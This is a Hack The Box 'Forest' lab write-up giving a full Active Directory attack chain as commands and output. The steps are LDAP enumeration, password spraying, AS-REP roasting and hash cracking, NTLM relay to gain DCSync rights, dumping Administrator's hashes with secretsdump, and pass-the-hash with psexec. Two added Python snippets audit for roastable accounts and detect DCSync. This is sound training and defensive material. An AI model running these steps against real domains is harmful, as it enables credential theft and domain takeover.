# HTB Forest

## LDAP 389/TCP - ldapsearch

LDAP normally provides verbose information about the AD. If anonymous bind is allowed, we can query a lot of useful AD information without any credentials, such as user accounts and the account policy.

### Anonymous (NULL) Bind

```
# ldapsearch null bind
#  -x  simple authentication instead of SASL (the default, e.g. DIGEST-MD5); with no -D/-w this is an anonymous bind
#  -s  scope
#  -b  base DN (the domain's distinguished name)

ldapsearch -H ldap://10.129.95.210 -x -s base
ldapsearch -H ldap://10.129.95.210:389 -x -b "dc=htb,dc=local"

# Account policy
 [+] Password Info for Domain: HTB
        [+] Minimum password length: 7
        [+] Account Lockout Threshold: None

# Accounts enumeration
ldapsearch -H ldap://10.129.95.210:389 -x -b DC=htb,DC=local "(objectClass=person)" | grep "sAMAccountName:"
...
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
```

### Remote Management Users

```
ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
```

## Windapsearch

{% embed url="https://github.com/ropnop/windapsearch" %}

```
# install
git clone https://github.com/ropnop/windapsearch
apt-get install libsasl2-dev libldap2-dev libssl-dev   # build dependencies of python-ldap
pip install python-ldap
```

```
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.95.210
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None
[+] Enumerating all AD users
[+]     Found 28 users: 
```

```
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 --custom "objectClass=*"
```

## Kerberos - 88/TCP

### kerbrute

{% embed url="https://github.com/ropnop/kerbrute/releases" %}

Brute force and enumerate valid AD accounts with kerbrute.

```
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
```

```
./kerbrute_linux_amd64 passwordspray -d htb.local --dc 10.129.95.210 ./user.txt 'pass' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/06/23 - Ronnie Flathers @ropnop

2023/06/06 14:15:55 >  Using KDC(s):
2023/06/06 14:15:55 >   10.129.95.210:88

2023/06/06 14:15:55 >  [!] svc-alfresco@htb.local:pass - Got AS-REP (no pre-auth) but couldn't decrypt - bad password                                                                                         
2023/06/06 14:15:55 >  [!] lucinda@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] mark@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] andy@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] santi@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] sebastien@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  Done! Tested 6 logins (0 successes) in 0.324 seconds

```

### Kerberoasting

Identify Kerberos Service Principal Names (SPNs) tied to accounts using Impacket's GetUserSPNs.

```
# list SPNs tied to accounts
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName>

# request the TGS tickets to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName> -request

# the response contains a Kerberos TGS-REP hash that can be cracked offline with hashcat or john
```

```
# AS-REP roasting: svc-alfresco does not require Kerberos pre-authentication (see the kerbrute
# output above), so the KDC hands out an AS-REP encrypted with the account's password-derived key
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210

# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1
```
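The defender-side counterpart of the GetNPUsers step, as an added example that is not part of the original write-up: decode `userAccountControl` from ldapsearch LDIF output and list the enabled accounts with `DONT_REQ_PREAUTH` set, i.e. the ones that would be AS-REP roastable. The LDIF sample and its flag values are constructed for the example.

```python
# Added example (not from the original write-up): audit ldapsearch LDIF output for
# accounts that do not require Kerberos pre-authentication. All input is constructed.
import re

# userAccountControl bits (MS-SAMR USER_ACCOUNT flags); only the ones used here.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Constructed sample of `ldapsearch -x -b DC=htb,DC=local "(objectClass=person)"` output,
# trimmed to the two attributes needed. 4260352 = 0x410200 has DONT_REQ_PREAUTH set.
SAMPLE_LDIF = """\
sAMAccountName: sebastien
userAccountControl: 66048

sAMAccountName: svc-alfresco
userAccountControl: 4260352

sAMAccountName: Guest
userAccountControl: 4194818
"""

def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]

def parse_ldif(text: str) -> dict[str, int]:
    """Map sAMAccountName -> userAccountControl for every entry in the LDIF text."""
    accounts = {}
    for entry in re.split(r"\n\s*\n", text.strip()):
        attrs = dict(line.split(": ", 1) for line in entry.splitlines() if ": " in line)
        if "sAMAccountName" in attrs and "userAccountControl" in attrs:
            accounts[attrs["sAMAccountName"]] = int(attrs["userAccountControl"])
    return accounts

def asrep_roastable(text: str) -> list[str]:
    """Enabled accounts with DONT_REQ_PREAUTH: the KDC answers an AS-REQ for them
    without proof of the password, which is what GetNPUsers collected above.
    Disabled accounts are skipped because their AS-REQ is rejected anyway."""
    return sorted(name for name, uac in parse_ldif(text).items()
                  if uac & 0x400000 and not uac & 0x0002)

if __name__ == "__main__":
    for name, uac in parse_ldif(SAMPLE_LDIF).items():
        print(f"{name:13} {uac:#010x} {' '.join(decode_uac(uac))}")
    print("AS-REP roastable:", asrep_roastable(SAMPLE_LDIF))
```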

### Hashcat - Cracking Kerberos ticket

```
# 18200 = Kerberos 5 AS-REP etype 23 (the $krb5asrep$23$ hash above); 13100 is the TGS-REP mode for Kerberoasting hashes
hashcat -m 18200 -a 0 svc_hash passwordlist.txt --force
# show the cracked result from the potfile
hashcat -m 18200 -a 0 svc_hash passwordlist.txt --force --show
```

### John the Ripper - Cracking Kerberos ticket

```
john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash 
```

![](/files/8QEPGUNMODtLHvOqG5C8)

### Crackmapexec - Test login to account

```
crackmapexec smb 10.129.95.210 -d htb.local -u svc-alfresco -p s3rvice
```

![](/files/FsUXIxw8WlFcr4B1qEwi)

## WinRM

WinRM (5985/TCP) is Microsoft's implementation of the WS-Management protocol; it allows remote PowerShell sessions.

Look for the Remote Management Users group:

```
ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
```

![](/files/pD6sw5waXrLu4IK7dS5m)

```
net rpc group members 'Privileged IT Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
```

![](/files/UXBZ2P3HF6mpF7CWWcB9)

```
net rpc group members 'Service Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
```

![](/files/JR7IQffnRgyvJMu7BFpt)

### Evil-WinRM

```
git clone https://github.com/Hackplayers/evil-winrm

ruby evil-winrm.rb -i 10.129.95.210 -u svc-alfresco -p s3rvice

```

![](/files/GAO5D4M9I8PqePL8nd1G)

```
net group /domain
```

![](/files/AnpRkHgm3JyVaVHtYco2)

Abusing the privileges of the "Account Operators" group (see the [BloodHound](#bloodhound-and-neo4j) inspection below), we continue the privilege escalation by creating a new user and using it for a DCSync attack.

## DCSync Attack through Exchange Trusted Subsystem group

{% embed url="https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/" %}

### Create domain account

```
PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain
```

![](/files/o4oQKXcmRbyVQCsBi9Ij)

### Impacket NTLM Relay

Impacket's ntlmrelayx.py performs NTLM relay attacks: it starts SMB and HTTP listeners and relays the authentication it receives to other protocols (SMB, HTTP, LDAP, etc.). Here it relays to LDAP with `--escalate-user`: the new user is a member of Exchange Trusted Subsystem, which is nested in Exchange Windows Permissions and therefore holds WriteDACL on the domain object, so ntlmrelayx can grant the user the replication rights needed for DCSync (the ACL chain is explained in the Fox-IT post linked above).

```
# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss
```

### DCSync attack - Dump Administrator LM/NT hash

```
# kali terminal2 (secretsdump.py from the impacket examples directory, or the Kali wrapper impacket-secretsdump)
impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up...
```
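What the DCSync step above looks like from the blue-team side, as an added example that is not part of the original write-up: the DRSUAPI replication request secretsdump makes is logged on the DC as Security event 4662 carrying the replication control-access GUIDs, and a non-DC account exercising them is the classic DCSync detection. The event records below are constructed; the account names reuse the ones from this write-up.

```python
# Added example (not from the original write-up): detection logic for the DCSync step
# above, run over constructed Windows Security event 4662 records. In production the
# records would come from the domain controllers' Security logs (object auditing enabled).

# Control-access right GUIDs that a replication (DCSync) request carries in the 4662
# "Properties" field. Only DCs and known sync services (e.g. Azure AD Connect) need them.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

# Constructed 4662 events (field names as in the Windows event XML). "FOREST$" stands in
# for the DC replicating normally, "bigb0ss" for the account created in this write-up,
# and the last GUID is a constructed non-replication placeholder.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectServer": "DS",
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "bigb0ss", "ObjectServer": "DS",
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "sebastien", "ObjectServer": "DS",
     "AccessMask": "0x10", "Properties": "{deadbeef-0000-4000-8000-000000000001}"},
]

def replication_rights(properties: str) -> list[str]:
    """Names of the replication rights referenced in a 4662 Properties field."""
    guids = [g.strip("{}").lower() for g in properties.split()]
    return [REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS]

def is_dcsync_candidate(event: dict, allowed: frozenset = frozenset()) -> bool:
    """A 4662 on the directory service (ObjectServer=DS) in which a non-machine,
    non-allow-listed principal exercised Get-Changes-All, the right that returns
    password hashes and that -just-dc-user above relied on."""
    if event.get("EventID") != 4662 or event.get("ObjectServer") != "DS":
        return False
    subject = event.get("SubjectUserName", "")
    if subject.endswith("$") or subject in allowed:
        return False  # DCs replicate legitimately; allow-list known sync accounts
    return "DS-Replication-Get-Changes-All" in replication_rights(event.get("Properties", ""))

def detect_dcsync(events: list[dict], allowed: frozenset = frozenset()) -> list[str]:
    """Subjects that triggered the heuristic, in log order."""
    return [e["SubjectUserName"] for e in events if is_dcsync_candidate(e, allowed)]

if __name__ == "__main__":
    print("DCSync suspects:", detect_dcsync(SAMPLE_EVENTS))  # ['bigb0ss']
```

The machine-account and allow-list filters are only a first cut: a compromised DC or sync account would pass them, so pair this with a baseline of which principals normally replicate.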

### PSEXEC - Login as administrator using hash

```
impacket-psexec htb.local/administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
```

![](/files/NqXv8SQBYdRCbkRVkpZI)

The following BloodHound analysis....

## BloodHound Kali - ingestor based on Impacket

Python-based ingestor built on Impacket.

{% embed url="https://github.com/fox-it/BloodHound.py" %}

```
pip install impacket
pip install ldap3
pip install bloodhound

git clone https://github.com/fox-it/BloodHound.py.git

./bloodhound.py -u svc-alfresco -p s3rvice -d htb.local -ns 10.129.95.210
```

![](/files/3MgxMTkDII7ckmfNPzTq)

## BloodHound and Neo4j

### Initial setup

```
apt install bloodhound
apt install neo4j

neo4j console
```

Start the neo4j console and first visit <http://localhost:7474> to complete the password wizard.

![](/files/x8sQ90v4111EYmi7Ag8x)

![](/files/2PTZg091Flmz0I9tmLDW)

### Start

```
./BloodHound --no-sandbox
```

![](/files/7Ju3K6EqqzAyTXjBYkVN)

Import data (upload icon)

![](/files/DRlJJb6xCkSarShnaArq)

Mark svc-alfresco as owned.

![](/files/rVa2j4lqkUwFTFopdtl0)

Click on svc-alfresco and choose "Unrolled membership".

![](/files/Iy35TZogvgjNqqLGVasi)

We can see the user is part of **"Account Operators"** group. Members of this group can create and modify most types of accounts.

Go back to the [DCSync attack](#dcsync-attack-through-exchange-trusted-subsystem-group).
